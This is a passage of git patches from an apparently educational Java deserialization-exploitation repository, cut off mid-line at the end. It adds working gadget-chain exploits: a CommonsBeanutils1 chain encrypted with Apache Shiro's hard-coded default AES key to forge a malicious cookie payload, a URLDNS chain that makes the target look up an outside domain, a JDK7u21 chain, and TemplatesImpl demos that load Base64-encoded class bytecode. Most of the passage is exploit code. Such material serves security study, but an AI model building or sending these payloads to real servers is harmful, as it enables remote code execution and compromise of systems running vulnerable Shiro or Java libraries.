Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{code}); + setFieldValue(obj, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); setFieldValue(obj, "_name", "HelloTemplatesImpl"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); diff --git a/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java b/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java new file mode 100644 index 0000000..4f59ed8 --- /dev/null +++ b/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java @@ -0,0 +1,20 @@ +package com.govuln.shiroattack; + +import javassist.ClassPool; +import javassist.CtClass; +import org.apache.shiro.crypto.AesCipherService; +import org.apache.shiro.util.ByteSource; + +public class Client1 { + public static void main(String []args) throws Exception { + ClassPool pool = ClassPool.getDefault(); + CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); + byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode()); + + AesCipherService aes = new AesCipherService(); + byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); + + ByteSource ciphertext = aes.encrypt(payloads, key); + System.out.printf(ciphertext.toString()); + } +} diff --git a/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java new file mode 100644 index 0000000..d7fcdd4 --- /dev/null +++ b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java @@ -0,0 +1,43 @@ +package com.govuln.shiroattack; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.beanutils.BeanComparator; + +import java.io.ByteArrayOutputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; +import java.util.PriorityQueue; + +public class CommonsBeanutils1Shiro { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public byte[] getPayload(byte[] clazzBytes) throws Exception { + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); + final PriorityQueue queue = new PriorityQueue(2, comparator); + // stub data for replacement later + queue.add("1"); + queue.add("1"); + + setFieldValue(comparator, "property", "outputProperties"); + setFieldValue(queue, "queue", new Object[]{obj, obj}); + + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(queue); + oos.close(); + + return barr.toByteArray(); + } +} From 372fb2a747fe3952354ff37c9b1badfc94956473 Mon Sep 17 00:00:00 2001 From: phith0n Date: Mon, 19 Apr 2021 20:55:03 +0800 Subject: [PATCH 25/35] add CommonsBeanutils1Shiro --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 4550056..dbfc6f7 100644 --- a/README.md +++ b/README.md @@ -21,6 +21,7 @@ - [Java安全漫谈 - 14.为什么需要CommonsCollections3](https://t.zsxq.com/i6Y7QN7) - [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) +- [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) ## Demo代码 @@ -47,3 +48,4 @@ Shiro反序列化: - 一个最简单的Shiro Web应用:[shirodemo](shirodemo/) - 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 - 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 +- 使用Shiro默认自带的commons-beanutils构造的反序列化利用链:[CommonsBeanutils1Shiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java) From a506fe4c443fb76451ecd03fc403126ac06b1259 Mon Sep 17 00:00:00 2001 From: phith0n Date: Thu, 3 Jun 2021 21:34:14 +0800 Subject: [PATCH 26/35] URLDNS --- .../com/govuln/deserialization/URLDNS.java | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 general/src/main/java/com/govuln/deserialization/URLDNS.java diff --git a/general/src/main/java/com/govuln/deserialization/URLDNS.java b/general/src/main/java/com/govuln/deserialization/URLDNS.java new file mode 100644 index 0000000..296614c --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/URLDNS.java @@ -0,0 +1,52 @@ +package com.govuln.deserialization; + +import java.io.*; +import java.lang.reflect.Field; +import java.net.InetAddress; +import java.net.URL; +import java.net.URLConnection; +import java.net.URLStreamHandler; +import java.util.HashMap; + +public class URLDNS { + + static class SilentURLStreamHandler extends URLStreamHandler { + + protected URLConnection openConnection(URL u) throws IOException { + return null; + } + + protected synchronized InetAddress getHostAddress(URL u) { + return null; + } + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String []args) throws Exception { + String url = "http://dns.675ba661.y7z.xyz"; + + //Avoid DNS resolution during payload creation + //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload. + URLStreamHandler handler = new SilentURLStreamHandler(); + + HashMap ht = new HashMap(); // HashMap that will contain the URL + URL u = new URL(null, url, handler); // URL to use as the Key + ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup. + + setFieldValue(u, "hashCode", -1); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(ht); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} From 12d64473659597c5d5b75b290faebec2e8a87661 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 23 Jun 2021 12:03:30 +0800 Subject: [PATCH 27/35] add JDK7u21 --- general/general.iml | 19 ++++++ general/pom.xml | 15 +++-- .../com/govuln/bytes/HelloDefineClass.java | 5 +- .../com/govuln/bytes/HelloTemplatesImpl.java | 4 +- .../deserialization/CommonsCollections3.java | 1 - .../CommonsCollectionsIntro2.java | 4 +- .../CommonsCollectionsIntro3.java | 4 +- .../com/govuln/deserialization/JDK7u21.java | 66 +++++++++++++++++++ .../TemplatesImplDeserialization.java | 4 +- 9 files changed, 107 insertions(+), 15 deletions(-) create mode 100644 general/general.iml create mode 100644 general/src/main/java/com/govuln/deserialization/JDK7u21.java diff --git a/general/general.iml b/general/general.iml new file mode 100644 index 0000000..7ee5fc5 --- /dev/null +++ b/general/general.iml @@ -0,0 +1,19 @@ + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/general/pom.xml b/general/pom.xml index 8ad9f54..9153046 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.8 - 1.8 + 1.7 + 1.7 @@ -42,6 +42,13 @@ javassist 3.12.1.GA + + + commons-codec + commons-codec + 1.15 + + @@ -94,8 +101,8 @@ org.apache.maven.plugins maven-compiler-plugin - 8 - 8 + 7 + 7 diff --git a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java index 9ae4bb9..93c46ac 100644 --- a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java +++ b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java @@ -1,7 +1,8 @@ package com.govuln.bytes; +import org.apache.commons.codec.binary.Base64; + import java.lang.reflect.Method; -import java.util.Base64; public class HelloDefineClass { public static void main(String[] args) throws Exception { @@ -9,7 +10,7 @@ public static void main(String[] args) throws Exception { defineClass.setAccessible(true); // source: bytecodes/Hello.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAHAoABgAOCQAPABAIABEKABIAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAApIZWxsby5qYXZhDAAHAAgHABYMABcAGAEAC0hlbGxvIFdvcmxkBwAZDAAaABsBAAVIZWxsbwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYAIQAFAAYAAAAAAAIAAQAHAAgAAQAJAAAAHQABAAEAAAAFKrcAAbEAAAABAAoAAAAGAAEAAAACAAgACwAIAAEACQAAACUAAgAAAAAACbIAAhIDtgAEsQAAAAEACgAAAAoAAgAAAAQACAAFAAEADAAAAAIADQ=="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAHAoABgAOCQAPABAIABEKABIAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAApIZWxsby5qYXZhDAAHAAgHABYMABcAGAEAC0hlbGxvIFdvcmxkBwAZDAAaABsBAAVIZWxsbwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYAIQAFAAYAAAAAAAIAAQAHAAgAAQAJAAAAHQABAAEAAAAFKrcAAbEAAAABAAoAAAAGAAEAAAACAAgACwAIAAEACQAAACUAAgAAAAAACbIAAhIDtgAEsQAAAAEACgAAAAoAAgAAAAQACAAFAAEADAAAAAIADQ=="); Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length); hello.newInstance(); } diff --git a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java index 598788e..c8fae6f 100644 --- a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java +++ b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java @@ -2,9 +2,9 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import java.lang.reflect.Field; -import java.util.Base64; public class HelloTemplatesImpl { public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { @@ -15,7 +15,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java index 521ce73..d8cce44 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java @@ -20,7 +20,6 @@ import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; -import java.util.Base64; import java.util.HashMap; import java.util.Map; diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java index d50a6ed..1ed70dd 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; @@ -9,7 +10,6 @@ import org.apache.commons.collections.Transformer; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -22,7 +22,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java index 0694a86..c7b8427 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java @@ -3,6 +3,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InstantiateTransformer; @@ -11,7 +12,6 @@ import javax.xml.transform.Templates; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -24,7 +24,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAA